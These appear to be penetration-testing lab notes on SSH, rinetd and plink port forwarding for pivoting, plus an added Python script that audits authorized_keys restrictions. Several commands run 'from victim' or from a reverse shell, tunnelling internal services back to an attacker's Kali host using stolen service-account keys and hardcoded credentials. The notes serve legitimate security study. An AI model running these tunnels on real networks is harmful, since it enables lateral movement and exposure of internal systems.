SSH

-N = no output (no remote command is run; forwarding only)

-f = background

Local port forwarding

ssh -N -L [bind_address:]port:host:hostport [username@address]

e.g.

ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128

Remote port forwarding

ssh -N -R <Windows IP>:<Windows Unused Port>:<Kali IP>:<Kali port> <username>@<Windows>

e.g.

ssh -f -N -R 192.168.119.224:2221:127.0.0.1:3306 root@192.168.119.224
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@10.11.0.4
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa kali@10.11.0.4

Dynamic port forwarding

From victim:

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>
ssh -N -D 127.0.0.1:2221 student@192.168.224.44

(scans through this proxy must use a full TCP connect scan, nmap -sT)

priv/pub keys

On kali (in ~/.ssh/authorized_keys):

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla
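
Added example, not part of the original notes: a Python check for authorized_keys entries like the one above. It reports which restrictions a forwarding-only key still lacks and catches a malformed key field, such as a doubled key-type keyword. The key blob is a constructed placeholder; permitlisten, permitopen and restrict are OpenSSH options the notes do not use.

```python
import base64

KEY_PREFIXES = ("ssh-", "ecdsa-", "sk-")   # how a key-type field starts
NO_FLAGS = {"no-pty", "no-agent-forwarding", "no-x11-forwarding"}

def split_unquoted(s, seps):
    """Split on separator characters that sit outside double quotes."""
    parts, cur, in_q, prev = [], "", False, ""
    for ch in s:
        if ch == '"' and prev != "\\":
            in_q = not in_q
        if ch in seps and not in_q:
            parts, cur = parts + [cur], ""
        else:
            cur += ch
        prev = ch
    return [p for p in parts + [cur] if p]

def parse_entry(line):
    """Return (options with lower-cased names, remaining fields)."""
    fields, opts = split_unquoted(line.strip(), " \t"), {}
    if fields and not fields[0].startswith(KEY_PREFIXES):
        for item in split_unquoted(fields.pop(0), ","):
            name, _, value = item.partition("=")
            opts[name.lower()] = value.strip('"')
    return opts, fields

def blob_matches(key_type, blob):
    """A public-key blob begins with a length-prefixed copy of its key type."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return False
    return raw[4:4 + int.from_bytes(raw[:4], "big")] == key_type.encode()

def audit(line):
    """List what keeps this entry from being a forwarding-only key."""
    opts, fields = parse_entry(line)
    if len(fields) < 2 or not blob_matches(fields[0], fields[1]):
        return ["malformed key field"]
    missing = {"from", "command", "permitlisten", "permitopen"} - opts.keys()
    if "restrict" not in opts:              # restrict implies the no-* flags
        missing |= NO_FLAGS - opts.keys()
    return sorted(missing)

# Constructed placeholder blob (not a usable key): type string plus padding.
BLOB = base64.b64encode((7).to_bytes(4, "big") + b"ssh-rsa" + bytes(8)).decode()
OPTS = 'from="10.11.1.250",command="echo forwarding only",no-agent-forwarding,no-X11-forwarding,no-pty'
print([audit(f"{OPTS} ssh-rsa {dup}{BLOB} www-data@ajla") for dup in ("", "ssh-rsa ")])
```

Without permitlisten the key holder can request any -R listen port; without permitopen, any -L destination reachable from the server.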

rinetd

nano /etc/rinetd.conf

0.0.0.0 PORT_LISTEN HOST_FORWARDED HOST_PORT

From victim:

.\plink.exe -ssh -l [user] -pw [password] -R [bind_address:][bind_port]:host:host_port  [address]
.\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306 192.168.224.44

On rev shell:

cmd.exe /c echo y | .\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306 192.168.224.44
